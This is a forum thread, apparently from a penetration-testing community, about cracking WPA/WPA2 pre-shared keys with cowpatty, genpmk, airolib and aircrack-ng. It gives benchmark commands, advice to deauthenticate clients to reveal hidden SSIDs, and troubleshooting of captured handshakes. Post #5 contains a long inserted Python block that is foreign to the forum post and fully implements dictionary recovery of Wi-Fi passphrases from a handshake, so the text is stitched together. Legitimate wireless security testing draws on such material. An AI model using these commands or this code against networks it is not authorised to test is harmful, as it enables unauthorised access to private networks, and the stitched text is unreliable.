
Thread: Benefits of Time-Memory Trade-Off in coWPAtty

  1. #1
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Benefits of Time-Memory Trade-Off in coWPAtty

    Background:
    Known SSID: "Harkonen"
    Captured EAPOL handshake "wpa2.eapol.cap"
    Dictionary file: passwords2.txt (~173,000 words)

    First example, using cowpatty with a known password list. Real-time hash generation:
    Code:
    bt ~ # cowpatty -f passwords2.txt -r wpa2.eapol.cap -s "Harkonen"
    ...
    44.89 passphrases/second
    Second example, first using genpmk to create the hash table ahead of time:
    Code:
    bt ~ # genpmk -f passwords2.txt -d testhash -s "Harkonen"
    And now running cowpatty with the pre-computed hash table:
    Code:
    bt ~ # cowpatty -d testhash -r wpa2.eapol.cap -s "Harkonen"
    ...
    172779 passphrases tested in 2.68 seconds:  64563.39 passphrases/second
    To test 172,779 passphrases at 44.89 passphrases/second would take 64+ minutes. On the other hand, by creating the hash tables ahead of time (approximate time of generation was 30 minutes), I was able to test all 172,779 passphrases in 2.68 seconds. This is an approximate increase of 3+ orders of magnitude!

    (btw, the passphrase was not in the dictionary as I wanted cowpatty to run through all the possibilities).
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Very interesting thread you got there, prez. Very informative. So it took you about 30 minutes to create the hashes... which shaved off about 34 minutes... hmmm... interesting.

  3. #3
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988


    Really interesting, dear Prez98...

    Around 35 min for all... it's really short...

    64563.39 passphrases/second... it's really fast... Nice...
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  4. #4
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    12

    genpmk and the 1mill+ password file?

    This should be in reply to the WPA Brute forcing thread in the specialist>wireless section of the forums, but I'm too noob to post there still.

    Prez mentioned a 1mill+ length password file used to create the hash tables in conjunction with the 1k most common SSIDs.

    A couple questions regarding that:

    Would there ever be a situation where the SSID is not known? If we know the SSID and take a day to compile hash tables, wouldn't that be faster than running the hack with 1,000 times the data in the hash list? Or am I misunderstanding the speed at which cowpatty operates on a hash table?

    To restate the question more clearly: would it be faster to use the 40GB hash tables with 1,000 SSIDs, or to build a hash table for the single SSID in question?

    Also, is the 1mill+ password file available for download?

    Thank you

    -Ethernull

  5. #5
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533


    Moved to existing thread.
    Originally Posted by Ethernull:
    To restate the question more clearly: would it be faster to use the 40GB hash tables with 1,000 SSIDs, or to build a hash table for the single SSID in question?
    Although I haven't tried it myself, based upon the numbers, I suspect that using the hash tables would be considerably faster. That of course assumes that the SSID is among the 1,000 in the list. Also, this assumes that the passphrase is actually in the password file.
    Originally Posted by Ethernull:
    Also, is the 1mill+ password file available for download?
    This link should work for you.
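    To make the trade-off discussed in posts #1 and #5 concrete, here is an added Python example (written for this page, not code from the thread or from cowpatty/genpmk) of the computation both tools perform as defined in IEEE 802.11i: the PMK is PBKDF2-HMAC-SHA1 with the SSID as salt, so a table precomputed for one SSID holds no valid PMK for any other, which is exactly why the 1,000-SSID tables only help when the target SSID is among them. The MACs, nonces, EAPOL skeleton, wordlist and passphrase below are constructed for illustration and stand in for the thread's wpa2.eapol.cap and passwords2.txt.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# WPA/WPA2-Personal PMK (IEEE 802.11i): PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 32 bytes.
# This is the expensive step cowpatty -f repeats per candidate and genpmk runs once, ahead of time.
def derive_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

# Key Confirmation Key: first 16 bytes of the 802.11i PRF-512 over both MACs and both nonces.
def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return hmac.new(pmk, b"Pairwise key expansion\x00" + data + b"\x00", hashlib.sha1).digest()[:16]

# WPA2/CCMP EAPOL-Key MIC: HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16 bytes.
def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]

# Constructed sample handshake (NOT the thread's wpa2.eapol.cap): fixed MACs and nonces and a
# zero-filled EAPOL-Key message 2 skeleton; its MIC is derived from the "unknown" passphrase below.
SSID = "Harkonen"
AA, SPA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes([0x11]) * 32, bytes([0x22]) * 32
EAPOL_ZEROED = b"\x02\x03\x00\x75\x02\x01\x0a" + b"\x00" * 110
_UNKNOWN_PASSPHRASE = "harkonen1"
MIC = eapol_mic(derive_kck(derive_pmk(_UNKNOWN_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE), EAPOL_ZEROED)
WORDS = ["password", "letmein", "harkonen1", "correcthorse"]  # constructed stand-in for passwords2.txt

def mic_matches(pmk: bytes) -> bool:
    kck = derive_kck(pmk, AA, SPA, ANONCE, SNONCE)
    return hmac.compare_digest(eapol_mic(kck, EAPOL_ZEROED), MIC)

# Real-time mode (cowpatty -f): a full PBKDF2 run, 4096 SHA-1 rounds, for every candidate.
def recover_realtime(words: Iterable[str], ssid: str) -> Optional[str]:
    for w in words:
        if mic_matches(derive_pmk(w, ssid)):
            return w
    return None

# genpmk step: the PBKDF2 cost is paid once per word and the PMKs are stored, bound to this SSID.
def build_pmk_table(words: Iterable[str], ssid: str) -> Dict[str, bytes]:
    return {w: derive_pmk(w, ssid) for w in words}

# Table mode (cowpatty -d): only the cheap PRF-512 + HMAC check remains per stored PMK. A table
# built for a different SSID holds the wrong PMK for every word, so it cannot match at all.
def recover_with_table(table: Dict[str, bytes]) -> Optional[str]:
    for w, pmk in table.items():
        if mic_matches(pmk):
            return w
    return None
```

    The same asymmetry is the defensive lesson: a site-unique SSID makes every generic table useless for that network, while the per-candidate PBKDF2 cost is fixed by the standard, so passphrase strength is what decides the single-SSID case.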

  6. #6
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988


    Well, the two in conjunction is the best.

    I use airolib to maintain an ESSID / pass sqlite database.
    I precompute this table (so when you add a new ESSID it's 99.xxxx % computed).

    First step is to verify if the victim ESSID is in the list... if it is, launch aircrack in conjunction with the database...

    If not in the list... then add the ESSID to the database and recompute the table...
    It's fast (airolib computes at about 100 k/s) because you only have a number of PMKs to compute equal to the number of passwords in the database...

    Then use aircrack with the database...

    Hope it's more clear...
    I'm French so it's not easy for me to explain something in English...


    For the case where you have no SSID, you can do a deauth attack; when the client reconnects you will catch the SSID...

    Hope this helps.

  7. #7
    Junior Member
    Join Date
    Jul 2006
    Posts
    88


    Does cowpatty only accept eapol.cap files, or .cap files too? Because when I tried to execute cowpatty to find the passphrase for the WPA-PSK, it kept saying the file is corrupt. However, in aircrack I had no problems.

  8. #8
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533


    Originally Posted by Funnyman:
    Does cowpatty only accept eapol.cap files, or .cap files too? Because when I tried to execute cowpatty to find the passphrase for the WPA-PSK, it kept saying the file is corrupt. However, in aircrack I had no problems.
    The name of the file doesn't matter, as long as it's a standard cap format and it has all four parts of the handshake.

  9. #9
    Junior Member
    Join Date
    Jul 2006
    Posts
    88


    Originally Posted by theprez98:
    The name of the file doesn't matter, as long as it's a standard cap format and it has all four parts of the handshake.
    Well, when I did the WPA crack, airodump registered a handshake in the top right corner of the konsole with the MAC of the AP.

  10. #10
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Ok... I'm having very similar issues with cowpatty to the ones Funnyman is having, except it says...

    Code:
    {-=Xploitz=-} ~ # cowpatty -r /root/xploitzpsk-01.cap -d /root/testhash -s "Xploitz Network"
    cowpatty 4.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    
    End of pcap capture file, incomplete TKIP four-way exchange.  Try using a
    different capture.
    {-=Xploitz=-} ~ #
    Now this is bullshit because I do have a 4-way handshake. I verified it through wireshark. And aircrack will accept this xploitzpsk-01.cap when I run it. Aircrack said...

    Code:
    {-=Xploitz=-} ~ # aircrack-ng -w testhash -b 00:18:F8:B5:F2:D6 xploitzpsk-01.cap
    Created thread for id 0.
    Opening xploitzpsk-01.cap
    Read 0 packets.
    
    
                                     Aircrack-ng 1.0 r611
    
    
                       [00:00:02] 108 keys tested (49.50 k/s)
    
    
                           Current passphrase: [*viva-voce\Y
    
    
          Master Key     : 0F EE 88 1C 15 6B 0F 15 C5 58 86 3F 05 73 91 D7
                           96 02 17 6F A1 59 9A AA DA 1C CD 3B 4C D4 CC E0
    
          Transcient Key : 0C D2 41 22 16 37 3F 63 2D 9F FE 6A FE 6F 1A 65
                           A3 98 EE 09 4F 16 74 6F CD E2 12 92 6F B8 AB CF
                           13 1A 86 DE 8C 29 F5 ED A6 0B 49 73 8F 0A C1 11
                           EE 13 9E 35 DC A2 E0 E4 98 8F D7 68 1C 8A 71 22
    
          EAPOL HMAC     : D8 B2 15 53 46 CF A7 2C 52 DC 5C 83 CA 79 74 BD
    
    Passphrase not in dictionnary
    Now I've tried deauthing myself... and I've tried catching the handshake without deauthing by powering up my other laptop and connecting to the internet. I KNOW that not deauthing and powering up my laptop WILL CAPTURE the 4-way handshake in ENTIRETY; I verified this in wireshark as well. But here's the catch: if I substitute my xploitzpsk-01.cap with the test one in /pentest/wireless/aircrack-ng/test/wpa2.eapol.cap, the ****er (cowpatty) will work!! WTF??? This would suggest that my capture didn't catch the 4-way handshake, but wireshark says I DID when I opened my xploitzpsk-01.cap file!! This is very frustrating because aircrack will let me but cowpatty won't. If there was a cowpatty forum I'd post my issues there, but it's Church of WIFI and I can't access the regular members' forums because I lack membership. Someone, please throw me a bone here!! Something... anything.
